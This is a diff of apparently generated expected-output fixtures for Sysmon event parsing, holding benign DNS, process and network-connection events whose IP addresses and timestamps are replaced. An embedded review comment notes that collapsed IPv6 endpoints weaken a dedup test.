Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -7385,7 +7301,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313828854Z", + "ingested": "2021-12-09T13:49:44.739430400Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.981137800Z'/\u003e\u003cEventRecordID\u003e6\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.981\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cdf4-5c8f-0000-0010071e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4648\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\Downloads\\Sysmon.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7449,11 +7365,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -7461,7 +7377,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -7469,7 +7385,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -7477,7 +7393,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -7485,21 +7401,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "151.139.128.14",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "network": {
@@ -7515,22 +7431,22 @@ "ocsp.sectigo.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313830187Z", + "ingested": "2021-12-09T13:49:44.739438200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -7628,7 +7544,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313831440Z", + "ingested": "2021-12-09T13:49:44.739444700Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:39.012744700Z'/\u003e\u003cEventRecordID\u003e7\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:39.012\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce03-5c8f-0000-0010e9462a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4508\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\wbem\\WmiPrvSE.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e6.3.9600.16384 (winblue_rtm.130821-1623)\u003c/Data\u003e\u003cData Name='Description'\u003eWMI Provider Host\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData 
Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=5A4C0E82FF95C9FB762D46A696EF9F1B68001C21\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1b-5c8c-0000-00102f610000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e560\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\svchost.exe -k DcomLaunch\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7678,15 +7594,15 @@ }, "destination": { "port": 53, - "ip": "a00:203:3000:3000:3000:3000:3000:3300" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 62141, - "ip": "a00:20f:0:0:18a2:6e00:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "domain", - "community_id": "1:EQDBfI6vAylArTBQHY8kNmaweOA=", + "community_id": "1:o5sHG56d/GR7mu8ASz0uSsv7uF0=", "transport": "udp", "type": "ipv6", "direction": "egress" 
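Review bot: In the @@ -7678 hunk the source.ip and destination.ip of the UDP/53 egress event are now the same address, `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6`, so this IPv6 fixture no longer has distinct endpoints and, in the following @@ -7700 hunk, related.ip shrinks from two entries to one; the same collapse happens in the @@ -8017 hunk, where both A records become `89.160.20.156` and resolved_ip ends up with a duplicate while related.ip is deduplicated. The expected output therefore stops exercising the case where two different addresses must both survive into related.ip, which is the behaviour a regression in the dedup step would break. Consider giving the destination (and the second A record) a different address from the supported subset, e.g. `"ip": "<second-supported-ipv6>"` as a placeholder, so both arrays keep two distinct entries. Since this file looks like generated expected output, the fix belongs in the corresponding test input log with this file regenerated rather than edited by hand.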
@@ -7700,14 +7616,13 @@ "NETWORK SERVICE" ], "ip": [ - "a00:20f:0:0:18a2:6e00:e0:ffff", - "a00:203:3000:3000:3000:3000:3000:3300" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313832814Z", + "ingested": "2021-12-09T13:49:44.739450500Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ea00:203:3000:3000:3000:3000:3000:3300\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData 
Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.089Z", 
@@ -7785,7 +7700,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313834119Z", + "ingested": "2021-12-09T13:49:44.739456400Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e9\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.3\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7837,7 +7752,7 @@ }, "destination": { "port": 443, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 1138, @@ -7846,7 +7761,7 @@ }, "network": { "protocol": "https", - "community_id": "1:W2ZbP8nXMY+YAGYw2h/3Sa8Gu/w=", + "community_id": "1:BPIgbA//CuXUCUo7V4pQn4uLQOk=", "transport": "tcp", "type": "ipv4", "direction": "egress" 
@@ -7861,13 +7776,13 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313835522Z", + "ingested": "2021-12-09T13:49:44.739462400Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e10\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.148\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData 
Name='SourcePort'\u003e1138\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e443\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ehttps\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -7917,7 +7832,7 @@ }, "destination": { "port": 443, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 1139, @@ -7926,7 +7841,7 @@ }, "network": { "protocol": "https", - "community_id": "1:5MsyqYltV9KkhIFGPWiByzQqHDo=", + "community_id": "1:FaLCJ8g6qTBdQh1Rvg2/ru25R6M=", "transport": "tcp", "type": "ipv4", "direction": "egress" 
@@ -7941,13 +7856,13 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313836822Z", + "ingested": "2021-12-09T13:49:44.739468300Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e11\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.214\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT-2012-R2\\vagrant\u003c/Data\u003e\u003cData Name='Protocol'\u003etcp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e1139\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
